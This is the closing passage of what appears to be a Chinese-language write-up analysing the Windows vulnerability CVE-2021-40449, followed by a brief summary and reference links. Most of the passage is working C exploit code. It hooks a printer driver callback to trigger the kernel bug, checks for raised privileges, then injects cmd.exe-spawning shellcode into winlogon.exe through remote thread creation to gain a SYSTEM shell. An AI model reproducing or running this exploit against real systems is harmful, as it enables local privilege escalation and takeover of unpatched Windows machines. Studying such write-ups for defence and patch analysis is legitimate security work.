// Print the name and process identifier for each process.
for (i = 0; i < cProcesses; i++)
{
if (aProcesses[i] != 0)
{
DWORD processID = aProcesses[i];
CHAR szProcessName[MAX_PATH] = "<unknown>";
// Get a handle to the process.
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, processID);
// Get the process name.
if (NULL != hProcess)
{
HMODULE hMod;
DWORD cbNeeded;
if (EnumProcessModules(hProcess, &hMod, sizeof(hMod),
&cbNeeded))
{
GetModuleBaseNameA(hProcess, hMod, szProcessName,
sizeof(szProcessName) / sizeof(TCHAR));
}
}
// Print the process name and identifier.
if (!lstrcmpA(szProcessName, name))
{
CloseHandle(hProcess);
return (processID);
}
// Release the handle to the process.
CloseHandle(hProcess);
}
}
return 0;
}
void SpawnShell() {
HANDLE hSystemProcess = INVALID_HANDLE_VALUE;
PVOID pLibRemote;
HMODULE hKernel32 = GetModuleHandleA("Kernel32");
DWORD processID;
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51" \
"\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \
"\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0" \
"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed" \
"\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88" \
"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44" \
"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" \
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" \
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" \
"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" \
"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a" \
"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" \
"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" \
"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" \
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47" \
"\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65" \
"\x78\x65\x00";
if ((processID = getProcessId("winlogon.exe")) == 0)
{
printf("[Error_%d] Couldn't retrieve process ID...\n", __LINE__);
return;
}
printf("[+] Retrieved process id: %d\n", processID);
hSystemProcess = OpenProcess(GENERIC_ALL, false, processID);
if (hSystemProcess == INVALID_HANDLE_VALUE || hSystemProcess == (HANDLE)0)
{
printf("[Error_%d] Couldn't open system process...\n", __LINE__);
return;
}
printf("[+] Got a handle on a system Process: %08p\n", hSystemProcess);
pLibRemote = VirtualAllocEx(hSystemProcess, NULL, sizeof(shellcode) * 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!pLibRemote)
{
printf("[Error_%d] Virtual alloc failed !\n", __LINE__);
return;
}
printf("[+] Allocation in system process succeded with address %08p\n", pLibRemote);
if (!WriteProcessMemory(hSystemProcess, pLibRemote, shellcode, sizeof(shellcode), NULL))
{
printf("[Error_%d] WriteProcessMemory failed !\n", __LINE__);
return;
}
HANDLE hThread = CreateRemoteThread(hSystemProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLibRemote, NULL, 0, NULL);
printf("[+] Writing in system process succeded\n");
if (hThread == NULL) {
printf("[Error_%d] CreateRemoteThread failed !\n", __LINE__);
return;
}
else
printf("[+] Remote thread created !\n");
CloseHandle(hSystemProcess);
}
int main() {
if (Init()) {
Hook_DrvEnablePDEV();
g::hdc = CreateDCA(NULL, g::szPrinterName, NULL, NULL);
if (g::hdc == 0) {
printf("[Error_%d] CreateDCA failed !\n", __LINE__);
exit(-1);
}
g::bIsTrigger = TRUE;
ResetDCA(g::hdc, NULL);
if (CheckPrivilege(g::hToken)) {
SpawnShell();
}
else {
printf("[Error_%d] Permission promotion failed!\n", __LINE__);
}
}
system("pause");
return 0;
}
4.2.效果
5.总结
从对 CVE-2021-40449的分析中,我学会了
-
win10下利用ZwQuerySystemInformation\textcolor{cornflowerblue}{ZwQuerySystemInformation}ZwQuerySystemInformation和NtSetInformationThread\textcolor{cornflowerblue}{NtSetInformationThread}NtSetInformationThread绕过 SMAP的方法
-
利用调色板进行任意内存大小的堆布局
6.参考
[1] https://bbs.pediy.com/thread-269930.htm
[2] https://www.freebuf.com/vuls/306179.html
[3] https://www.jianshu.com/p/f8a210a97860
[4] https://nvd.nist.gov/vuln/detail/CVE-2021-40449